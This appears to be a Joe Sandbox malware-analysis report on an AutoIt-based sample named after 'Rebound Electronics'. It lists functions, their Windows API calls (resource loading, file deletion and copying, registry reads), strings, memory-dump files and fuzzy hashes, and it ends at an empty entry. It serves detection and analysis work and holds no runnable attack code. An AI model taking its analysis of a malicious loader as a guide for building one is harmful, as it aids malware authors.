FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C2449E,?,?,00000000,00000001), ref: 00C24092
LoadResource.KERNEL32(?,00000000,?,?,00C2449E,?,?,00000000,00000001,?,?,?,?,?,?,00C241FB), ref: 00C94F1A
SizeofResource.KERNEL32(?,00000000,?,?,00C2449E,?,?,00000000,00000001,?,?,?,?,?,?,00C241FB), ref: 00C94F2F
LockResource.KERNEL32(00C2449E,?,?,00C2449E,?,?,00000000,00000001,?,?,?,?,?,?,00C241FB,00000000), ref: 00C94F42

Strings

SCRIPT, xrefs: 00C24088

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: b7c83cada1e205139de1f8b6612ab4c65ed8b53c2836f077ef1c2d1bcc0d5a9a
Instruction ID: 55d0c1a35053e5cfe963c9bc6947bf6fa74933d03875df267b119152fe0c84db
Opcode Fuzzy Hash: b7c83cada1e205139de1f8b6612ab4c65ed8b53c2836f077ef1c2d1bcc0d5a9a
Instruction Fuzzy Hash: 22115A70200711AFE7258B65EC48F677BB9EBCAB55F20412DF6138BAA0DB71DD40CA20

Function 00C66CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00C92F49), ref: 00C66CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00C66CCA
FindClose.KERNEL32(00000000), ref: 00C66CDA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: a6615e8fcb59af46230acc080cfa2ac2cf0d240d337bdc361eff627c50f940d5
Instruction ID: e5e3125c9a59a61007bfcc455c616803ad2e83e436471a69d24ba64cea34602b
Opcode Fuzzy Hash: a6615e8fcb59af46230acc080cfa2ac2cf0d240d337bdc361eff627c50f940d5
Instruction Fuzzy Hash: 7FE0483181491567C2206738EC4D5ED77ACDA0633DF204716F577C25D0EB70DE4585D6

Function 00C33B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

@, xrefs: 00C34176

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @
API String ID: 3728558374-2766056989
Opcode ID: 1e94eef2fab01c85fe861c4033f5035b4ec511a5e9aff3424418305a437976b4
Instruction ID: 040d582785c85699963118c98591cd665b2fb1a3921e737805a190fc1b8d35eb
Opcode Fuzzy Hash: 1e94eef2fab01c85fe861c4033f5035b4ec511a5e9aff3424418305a437976b4
Instruction Fuzzy Hash: 0472DE70E24249EFCF24DF94C485ABEB7B5FF48300F14805AE81AAB291D735AE45DB91

Function 00C33200 Relevance: 1.0, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 68a25eabe60f236e2a102dbfbe6a462630feac8158b6eb909406eba89e88dd48
Instruction ID: 5e42351fe891c4fbede15b395c8ecc04d0ad9857c57bcbee337855ab5762a0a6
Opcode Fuzzy Hash: 68a25eabe60f236e2a102dbfbe6a462630feac8158b6eb909406eba89e88dd48
Instruction Fuzzy Hash: 40926B706083819FDB24DF19C484B6AB7E1FF88304F14885DF89A8B2A2D775EE45DB52

Function 00C2E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C2E959
timeGetTime.WINMM ref: 00C2EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C2ED2E
TranslateMessage.USER32(?), ref: 00C2ED3F
DispatchMessageW.USER32(?), ref: 00C2ED4A
LockWindowUpdate.USER32(00000000), ref: 00C2ED79
DestroyWindow.USER32 ref: 00C2ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C2ED9F
Sleep.KERNEL32(0000000A), ref: 00C95270
TranslateMessage.USER32(?), ref: 00C959F7
DispatchMessageW.USER32(?), ref: 00C95A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C95A19

Strings

@GUI_WINHANDLE, xrefs: 00C95360
@TRAY_ID, xrefs: 00C954C9
@GUI_CTRLID, xrefs: 00C95314
@GUI_CTRLHANDLE, xrefs: 00C953AC

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: eb2e2897b02d88e477a89bd255f15930ee69ac4534652d5e7e19e80bbe587e5a
Instruction ID: 0ad5cfc3c3d2e6bc2ef17d0837a1138bd5691b1beb862eca8130a1e9d4d5194d
Opcode Fuzzy Hash: eb2e2897b02d88e477a89bd255f15930ee69ac4534652d5e7e19e80bbe587e5a
Instruction Fuzzy Hash: 92621370508390DFEB25DF24D889BAE77E4BF44304F08086DF99A9B692DB70D948DB52

Function 00C55C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00C55EC3
___createFile.LIBCMT ref: 00C55F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00C55F2D
__dosmaperr.LIBCMT ref: 00C55F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00C55F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00C55F6A
__dosmaperr.LIBCMT ref: 00C55F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C55F7C
__set_osfhnd.LIBCMT ref: 00C55FAC
__lseeki64_nolock.LIBCMT ref: 00C56016
__close_nolock.LIBCMT ref: 00C5603C
__chsize_nolock.LIBCMT ref: 00C5606C
__lseeki64_nolock.LIBCMT ref: 00C5607E
__lseeki64_nolock.LIBCMT ref: 00C56176
__lseeki64_nolock.LIBCMT ref: 00C5618B
__close_nolock.LIBCMT ref: 00C561EB

Part of subcall function 00C4EA9C: CloseHandle.KERNELBASE(00000000,00CCEEF4,00000000,?,00C56041,00CCEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C4EAEC
Part of subcall function 00C4EA9C: GetLastError.KERNEL32(?,00C56041,00CCEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C4EAF6
Part of subcall function 00C4EA9C: __free_osfhnd.LIBCMT ref: 00C4EB03
Part of subcall function 00C4EA9C: __dosmaperr.LIBCMT ref: 00C4EB25

Part of subcall function 00C47C0E: __getptd_noexit.LIBCMT ref: 00C47C0E

__lseeki64_nolock.LIBCMT ref: 00C5620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00C56342
___createFile.LIBCMT ref: 00C56361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00C5636E
__dosmaperr.LIBCMT ref: 00C56375
__free_osfhnd.LIBCMT ref: 00C56395
__invoke_watson.LIBCMT ref: 00C563C3
__wsopen_helper.LIBCMT ref: 00C563DD

Strings

@, xrefs: 00C55F98

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: 747ee8769284215d744ebbd7aa9334911aa925f3587f3ddb2f8d9c9170217c12
Instruction ID: fc7562145ba77ef888ef498920f9b4e193c86f39851b43fa43f73fe49c166614
Opcode Fuzzy Hash: 747ee8769284215d744ebbd7aa9334911aa925f3587f3ddb2f8d9c9170217c12
Instruction Fuzzy Hash: 9F2237799005069BEF259F68CC95BBD7B71FB00326F644228EC219B2E2C7358EC8D759

Function 00C4EE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 334f90d8b32923a76d6e7889e9fd3c867ecba90f891c9b4545ef9acf8afc20fd
Instruction ID: 7464876afa25a638ae4fec9b507842aea8b0d1f53f2414f77fe1869d6b2e180d
Opcode Fuzzy Hash: 334f90d8b32923a76d6e7889e9fd3c867ecba90f891c9b4545ef9acf8afc20fd
Instruction Fuzzy Hash: 0A321771E04285DFDB218FA8D880BAD7BB1BF45314F25416EE8659F292C7709D43CBA1

Function 00C6FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 00C6FA96
_wcschr.LIBCMT ref: 00C6FAA4
_wcscpy.LIBCMT ref: 00C6FABB
_wcscat.LIBCMT ref: 00C6FACA
_wcscat.LIBCMT ref: 00C6FAE8
_wcscpy.LIBCMT ref: 00C6FB09
__wsplitpath.LIBCMT ref: 00C6FBE6
_wcscpy.LIBCMT ref: 00C6FC0B
_wcscpy.LIBCMT ref: 00C6FC1D
_wcscpy.LIBCMT ref: 00C6FC32
_wcscat.LIBCMT ref: 00C6FC47
_wcscat.LIBCMT ref: 00C6FC59
_wcscat.LIBCMT ref: 00C6FC6E

Part of subcall function 00C6BFA4: _wcscmp.LIBCMT ref: 00C6C03E
Part of subcall function 00C6BFA4: __wsplitpath.LIBCMT ref: 00C6C083
Part of subcall function 00C6BFA4: _wcscpy.LIBCMT ref: 00C6C096
Part of subcall function 00C6BFA4: _wcscat.LIBCMT ref: 00C6C0A9
Part of subcall function 00C6BFA4: __wsplitpath.LIBCMT ref: 00C6C0CE
Part of subcall function 00C6BFA4: _wcscat.LIBCMT ref: 00C6C0E4
Part of subcall function 00C6BFA4: _wcscat.LIBCMT ref: 00C6C0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00C6FA61

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 629190463449788e8e513f36db2f37b28e07a56728939c86b5aeffdc7062fc7f
Instruction ID: 026e8e30362d2a8380fc618c08ca33408e8b8b63889c486d3e07e43620cd4871
Opcode Fuzzy Hash: 629190463449788e8e513f36db2f37b28e07a56728939c86b5aeffdc7062fc7f
Instruction Fuzzy Hash: 80919272504305AFDB20EF54D891F9AB3E8FF84310F04486DF999972A2DB30EA45DB96

Function 00C23F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C23F86
RegisterClassExW.USER32(00000030), ref: 00C23FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C23FC1
InitCommonControlsEx.COMCTL32(?), ref: 00C23FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C23FEE
LoadIconW.USER32(000000A9), ref: 00C24004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C24013

Strings

+, xrefs: 00C23F6F
0, xrefs: 00C23F68
AutoIt v3 GUI, xrefs: 00C23FA2
TaskbarCreated, xrefs: 00C23FB6

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 6af2af1ab32bb589c76c5522be405b29d08ceb287da3734a68411dd828b24224
Instruction ID: a434f12ddd88c784deb2af5ba65c8253692c96bd448be999041ba160c9136836
Opcode Fuzzy Hash: 6af2af1ab32bb589c76c5522be405b29d08ceb287da3734a68411dd828b24224
Instruction Fuzzy Hash: 2521C4B5910358AFDB00DFA4E889BCDBBB8FB09704F04421AFA16AB2A0D7B445548F91

Function 00C6BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C6BDB4: __time64.LIBCMT ref: 00C6BDBE

Part of subcall function 00C24517: _fseek.LIBCMT ref: 00C2452F

__wsplitpath.LIBCMT ref: 00C6C083

Part of subcall function 00C41DFC: __wsplitpath_helper.LIBCMT ref: 00C41E3C

_wcscpy.LIBCMT ref: 00C6C096
_wcscat.LIBCMT ref: 00C6C0A9
__wsplitpath.LIBCMT ref: 00C6C0CE
_wcscat.LIBCMT ref: 00C6C0E4
_wcscat.LIBCMT ref: 00C6C0F7
_wcscmp.LIBCMT ref: 00C6C03E

Part of subcall function 00C6C56D: _wcscmp.LIBCMT ref: 00C6C65D
Part of subcall function 00C6C56D: _wcscmp.LIBCMT ref: 00C6C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C6C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C6C338
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C6C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C6C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C6C371

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 29453b940f9cab898748cd1b69c59117d777eb6473c50ca410caf25319b6d317
Instruction ID: 70fbe7dab47ee6ed26d9411471d280bdcceb10d3eccad3934bc413fe6cf1b166
Opcode Fuzzy Hash: 29453b940f9cab898748cd1b69c59117d777eb6473c50ca410caf25319b6d317
Instruction Fuzzy Hash: 40C12DB1E00229ABDF25DF95CCC1EEEB7BCAF49310F1040A6F649E6151DB309A449F61

Function 00C23742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00C237B3
KillTimer.USER32(?,00000001), ref: 00C237DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C23800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C2380B
CreatePopupMenu.USER32 ref: 00C2381F
PostQuitMessage.USER32(00000000), ref: 00C2382E

Strings

TaskbarCreated, xrefs: 00C23806

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 342e98caff7c80c87bb8b9e452f2e1e59bc1770e56f422c94fbbe9d1187256a1
Instruction ID: 947bc93ed68b6b0584ff4b55710ebdbcf5ed891a39e27bbd0b8a30140f830c73
Opcode Fuzzy Hash: 342e98caff7c80c87bb8b9e452f2e1e59bc1770e56f422c94fbbe9d1187256a1
Instruction Fuzzy Hash: 564125F12142E6ABDF145F69BE8EB7E36A5F700B00F080125FD13D6991CA789FA09761

Function 00C23E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C23E79
LoadCursorW.USER32(00000000,00007F00), ref: 00C23E88
LoadIconW.USER32(00000063), ref: 00C23E9E
LoadIconW.USER32(000000A4), ref: 00C23EB0
LoadIconW.USER32(000000A2), ref: 00C23EC2

Part of subcall function 00C24024: LoadImageW.USER32(00C20000,00000063,00000001,00000010,00000010,00000000), ref: 00C24048

RegisterClassExW.USER32(?), ref: 00C23F30

Part of subcall function 00C23F53: GetSysColorBrush.USER32(0000000F), ref: 00C23F86
Part of subcall function 00C23F53: RegisterClassExW.USER32(00000030), ref: 00C23FB0
Part of subcall function 00C23F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C23FC1
Part of subcall function 00C23F53: InitCommonControlsEx.COMCTL32(?), ref: 00C23FDE
Part of subcall function 00C23F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C23FEE
Part of subcall function 00C23F53: LoadIconW.USER32(000000A9), ref: 00C24004
Part of subcall function 00C23F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C24013

Strings

0, xrefs: 00C23F02
AutoIt v3, xrefs: 00C23F1F
#, xrefs: 00C23F09

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: a535a175ba57f4404bd27bf285bb35cd199244d56cbff4dc910622dfc85aae17
Instruction ID: 37d49e195a35098f5513bab63f4f7a0da837fb7a6fd38b31ddc12a3f20a462fb
Opcode Fuzzy Hash: a535a175ba57f4404bd27bf285bb35cd199244d56cbff4dc910622dfc85aae17
Instruction Fuzzy Hash: 892130B1E00394ABCB04DFA9EC85B9DBFF5FB48314F04412AEA15AB2A0D7754654CF91

Function 018CC2F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 018CC3C1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018CC5E7

Memory Dump Source

Source File: 00000000.00000002.1692975510.00000000018C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 018C9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18c9000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 11f20d2db8f7eceefb1b722ad3e7c06939dc38edcaa639a3333f559b67860caa
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: C9A1F774E00209EBDB14CFA8C894BEEBBB5BF58704F208559E205BB281D7759A81CF95

Function 00C249FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00C24A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C941DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C9421A
RegCloseKey.ADVAPI32(?), ref: 00C94249

Strings

Include, xrefs: 00C941D3, 00C94212
Software\AutoIt v3\AutoIt, xrefs: 00C24A13

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: abcceff9fbcc161426bad3696ba017cc8daf1efe0edbb671c8e870fc35010bea
Instruction ID: 3cdded239afdf454ef3567600ff1ea7f9387d26ee97c221e3a846a04f94be4d3
Opcode Fuzzy Hash: abcceff9fbcc161426bad3696ba017cc8daf1efe0edbb671c8e870fc35010bea
Instruction Fuzzy Hash: 33113D75A00218BFEB04ABA4DD86EEF7BACEF15744F004069B517E7191EA70AE02E750

Function 00C236B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

